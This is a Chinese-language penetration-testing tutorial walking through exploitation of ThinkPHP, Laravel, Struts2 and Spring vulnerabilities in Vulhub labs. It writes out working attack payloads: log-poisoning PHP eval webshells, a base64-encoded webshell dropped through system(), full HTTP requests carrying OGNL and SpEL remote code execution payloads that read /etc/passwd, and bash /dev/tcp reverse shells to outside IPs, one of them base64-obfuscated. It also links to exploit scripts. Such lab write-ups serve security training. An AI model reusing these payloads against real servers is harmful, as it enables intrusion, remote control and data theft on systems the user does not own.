目录
案例一:PHP-开发框架安全-Thinkphp&Laravel
[ThinkPHP5 5.0.23](#ThinkPHP5 5.0.23)
案例二:JAVAWEB-开发框架安全-Spring&Struts2
[strust2 CVE-2020-17530](#strust2 CVE-2020-17530)
思维导图
data:image/s3,"s3://crabby-images/772c1/772c1c47bdae37c64f16a24e92e1a9c26de057e1" alt=""
data:image/s3,"s3://crabby-images/30983/309838947ce209823c37ecf04d0ec6c2df775ee7" alt=""
常见语言开发框架:
PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend等
JAVA:Spring MyBatis Hibernate Struts2 Springboot等
Python:Django Flask Bottle Turbobars Tornado Web2py等
Javascript:Vue.js Node.js Bootstrap JQuery Angular等
框架就是别人写好的成品,例如:文件上传(内置过滤)
data:image/s3,"s3://crabby-images/e3312/e3312039602bcad7d949dce2dfdb5c9bfb827f20" alt=""
案例一:PHP-开发框架安全-Thinkphp&Laravel
如何检测是否是thinkphp开发的?
- 利用工具wappalyzer,但不一定能检测出来
data:image/s3,"s3://crabby-images/09f39/09f39b308a31b44743014d67e4947faf3589ff96" alt=""
2.查看返回包
data:image/s3,"s3://crabby-images/ec442/ec4426e20315ea5d0bb17b6a9f1c70225f4bfe1a" alt=""
Thinkphp3.2.x日志泄露
thinkphp的默认日志路径为
开启debug模式日志保存在:\Application\Runtime\Logs\Home\
未开启debug模式日志保存在:\Application\Runtime\Logs\Common\
上传代码到服务器上
上传恶意代码到服务器上,需包含其文件相对或绝对路径
/index.php?m=Home&c=Index&a=index&value[_filename]=./[filename]
模块 (m): Home
控制器 (c): Index
动作 (a): index
请求参数:
- value[_filename] = ./Application/Runtime/Logs/Home/24_04_16.log
含义:
此 URL 表示对 Home 模块下的 Index 控制器中的 index 动作发出的请求,并指定了一个名为 value[_filename] 的请求参数,其值为一个文件路径。此文件路径指向一个日志文件,该日志文件存储在应用程序的 Runtime 目录下的 Logs/Home 子目录中,其名称为 24_04_16.log。
靶场环境:
data:image/s3,"s3://crabby-images/f1cc9/f1cc9f935e4771b2151d1057d854f9f5cbab337b" alt=""
自动化脚本检测
脚本下载地址:
链接:https://pan.baidu.com/s/1goi2IBZaJwRWe2qCLO37ig?pwd=bxsi
提取码:bxsi
data:image/s3,"s3://crabby-images/254f1/254f1e8487d2f6740ca91e5395eac0f046b21e38" alt=""
点击命令执行,会出现一个日志地址
data:image/s3,"s3://crabby-images/d2889/d2889dfdbffccab488e506ba78468e59936e24b7" alt=""
访问该地址,查看源代码
data:image/s3,"s3://crabby-images/04314/04314805906f47a434419b5d286f275bbaa383c1" alt=""
如何getshell
请求地址的时候会写入日志文件
?m=Home&c=Index&a=index&value[_filename]=./<?php eval($_REQUEST['a']);?>
日志文件的地址
?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/24_04_16.log
data:image/s3,"s3://crabby-images/53f9e/53f9e0d16151294dc9c952aefb73420cf652d114" alt=""
蚁剑测试连接
data:image/s3,"s3://crabby-images/26565/26565d422c84f3f0ec716b1c50a3a5ee3d03a875" alt=""
手工注入
参考文献:【漏洞通报】ThinkPHP3.2.x RCE漏洞通报
抓包3306端口页面,payload
/index.php?m=Home&c=Index&a=index&test=--><?=phpinfo();?>
data:image/s3,"s3://crabby-images/25cd5/25cd5d8f9af5606b1646288428a8115219246cca" alt=""
访问日志文件
ThinkPHP5 5.0.23
靶场位置:Vulhub - Docker-Compose file for vulnerability environment
手工注入
抓包发送到repeater,修改包信息如下
POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
复现
data:image/s3,"s3://crabby-images/5f3b4/5f3b490ef3077d893657d7f3faa9484bf1bebd96" alt=""
获取phpinfo()
data:image/s3,"s3://crabby-images/1af5f/1af5fecfa6d126c85abb4d8b00aa13f9bc8013cd" alt=""
getshell,payload
echo "PD9waHAgZXZhbCgkX1JFUVVFU1RbMV0pPz4=" | base64 -d > a.php
如果直接传一句话木马的话会被转义
data:image/s3,"s3://crabby-images/a6f10/a6f103ac08dcb11b41c83c74b7b8cfa9a3f9c065" alt=""
需要先把语句进行base64编码 再用管道符进行base64 -d 解码
data:image/s3,"s3://crabby-images/8d515/8d5150638200e1108f5eb88f9de9f050bb7a2eee" alt=""
格式变了
data:image/s3,"s3://crabby-images/af026/af026b55e1615967f2d26929214380727acec85d" alt=""
蚁剑连接
data:image/s3,"s3://crabby-images/17965/1796563d5570064c098fbf71d572e2669687306c" alt=""
工具检测
data:image/s3,"s3://crabby-images/aefee/aefeeaf49a6e586850ea3e704ca7da2729a7a1a7" alt=""
命令执行
data:image/s3,"s3://crabby-images/4b522/4b5220de470089e9370ee3a2aca30609813f0e62" alt=""
反弹shell
data:image/s3,"s3://crabby-images/2d27b/2d27ba6ef8852b4459c3f1175fa72230e55d4dc2" alt=""
蚁剑连接
data:image/s3,"s3://crabby-images/21d09/21d09edbd79aae402cd55df826e1e6969ec45bbe" alt=""
laravel-cve_2021_3129
靶场环境:
data:image/s3,"s3://crabby-images/8ea4e/8ea4e0baef2c6024b48c13b3ea39c29d84988821" alt=""
插件检测
data:image/s3,"s3://crabby-images/92421/924216761e47da579c5031c2533cea2a3d4a4767" alt=""
寻找脚本的思路
data:image/s3,"s3://crabby-images/428a1/428a1720f3d144d130be024d5958f48511218f8e" alt=""
发现报过该漏洞,去git上直接搜版本号
data:image/s3,"s3://crabby-images/271b4/271b43e33e45e7e556e468d4224c4482769fb01b" alt=""
脚本:https://github.com/zhzyker/CVE-2021-3129
利用,貌似不能getshell
data:image/s3,"s3://crabby-images/b5af7/b5af7cbbdc5800e3d114cb0b30d5ea30d4489b1d" alt=""
发现不能getshell直接换个脚本
案例二:JAVAWEB-开发框架安全-Spring&Struts2
strust2:是一个基于 MVC 设计模式的 Web 应用框架
如何判断用的是strust2,如果后缀是action
data:image/s3,"s3://crabby-images/dc38a/dc38ac0f4532b0d30aa4c9a1befd69446491582f" alt=""
20年以前的漏洞都可以直接利用工具利用
data:image/s3,"s3://crabby-images/1f461/1f461189f3cf1eb530c5c93c96b8771df3a7ae6a" alt=""
工具直接利用
知道版本后直接替换,就可以利用执行命令
data:image/s3,"s3://crabby-images/625b9/625b97306f7baeabaac38895cf3a972d92205806" alt=""
换一个漏洞也可以直接利用
data:image/s3,"s3://crabby-images/3c38f/3c38fdbe695f4fbe7b85f6f24dc3e465e184f212" alt=""
strust2 CVE-2020-17530
脚本地址:https://github.com/wuzuowei/CVE-2020-17530
命令执行
data:image/s3,"s3://crabby-images/60b37/60b37f5e54238cc40ba6881742abf0af0fb04f56" alt=""
getshell
data:image/s3,"s3://crabby-images/aae69/aae696916d091a0b053d5f34b0f5dcf03250e94a" alt=""
raw_input 为python2的模块,这里反弹shell要用到公网ip,用vulhub搭建一个本地环境
靶场地址:Vulhub - Docker-Compose file for vulnerability environment
data:image/s3,"s3://crabby-images/40372/403728df89042606183ccb64f237630ba72eb41b" alt=""
利用脚本成功getshell
data:image/s3,"s3://crabby-images/95a72/95a7238eda2dc2c824d365380786d7b2295ed475" alt=""
cve_2021_31805
这里靶场还用的上一个靶场
脚本地址:https://github.com/pyroxenites/s2-062
data:image/s3,"s3://crabby-images/516e8/516e8c7ffc99b816d3d5742479162915df89c97f" alt=""
手工测试payload
POST /index.action HTTP/1.1
Host: X.X.X.X:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 1096
------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"
%{
(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))
}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF---
测试
data:image/s3,"s3://crabby-images/1ce12/1ce122828881266c054fee47eb803207cc9dc87b" alt=""
反弹shell
data:image/s3,"s3://crabby-images/d7a70/d7a70b29599c03636b3fee33c99376f8a213f033" alt=""
data:image/s3,"s3://crabby-images/db117/db117ff1a9e44e9df45a4a2e48575f1bbf6020ed" alt=""
spring框架
spring本身漏洞不多,大部分漏洞都在他的一些分支上
CVE-2017-4971
靶场环境:https://vulhub.org/#/environments/spring/CVE-2017-4971/
访问以后先登录,然后输入账号密码
data:image/s3,"s3://crabby-images/f7695/f7695810e1205d4af34f99d89e56d551e5aabf77" alt=""
点击访问id为1的酒店然后预定
data:image/s3,"s3://crabby-images/ee6fe/ee6fe93d76d3a0e3d9c55f46da4eb21d8f1b20b1" alt=""
点击确认的时候进行抓包
data:image/s3,"s3://crabby-images/a7d16/a7d16f4a9ea2f2465135d041181353ee2a7d0d2d" alt=""
payload包
_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/10.0.0.1/21 0>&1")).start()=vulhub
直接发送过去不会反弹shell,原因是由于url编码会导致有些空格等不会识别
data:image/s3,"s3://crabby-images/3be0d/3be0da18d58182b9b86995908554cc214288edf4" alt=""
进行转码
data:image/s3,"s3://crabby-images/a476b/a476b4dc132b1f2eadd92069199eb35b06aebd0a" alt=""
编码以后成功getshell
data:image/s3,"s3://crabby-images/a0ddb/a0ddb9edd162277a82f8f69df7030d3a4d9f23ff" alt=""
CVE-2018-1273
靶场位置:https://vulhub.org/#/environments/spring/CVE-2018-1273/
靶场页面中spring的一些标识
data:image/s3,"s3://crabby-images/58f55/58f5577416400e5db29f4bdae8d00c8dbcf28d82" alt=""
访问user页面输入数据抓包
data:image/s3,"s3://crabby-images/c235f/c235fe95650e8d3ab64a2ac308219b068c95580b" alt=""
payload
POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=
修改命令为
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3Mi4xMzIvNTU2NiAwPiYx}|{base64,-d}|{bash,-i}
未url编码之前不能够反弹shell
data:image/s3,"s3://crabby-images/8e6e4/8e6e48148972a06467ec6e22532d191d0c7fbd51" alt=""
编码以后
data:image/s3,"s3://crabby-images/8e159/8e1592b9ab983ba22e8ad25a4b3c1e7aa27fb38c" alt=""
修改编码以后,并且将connection变为keep-alive成功反弹shell
data:image/s3,"s3://crabby-images/e5b6f/e5b6f73825784f4a1f5153a7399fafef8c8766d1" alt=""
CVE-2022-22963
靶场环境:Vulhub - Docker-Compose file for vulnerability environment
访问页面
data:image/s3,"s3://crabby-images/c0b5f/c0b5fb32089c074ea27e3e48fea16a3d0bf54fad" alt=""
抓包发送到repeater修改数据包,payload包如下
POST /functionRouter HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/success")
Content-Type: text/plain
Content-Length: 4
test
修改命令为反弹shell的命令
data:image/s3,"s3://crabby-images/e5006/e5006904c7b2c67b9dea2cd65f7c19b6a84237b4" alt=""
这里由于是请求头的原因,就算content-type为url编码格式,也不影响
data:image/s3,"s3://crabby-images/52edf/52edf106ec3a313800972a02950ca889f0205cf3" alt=""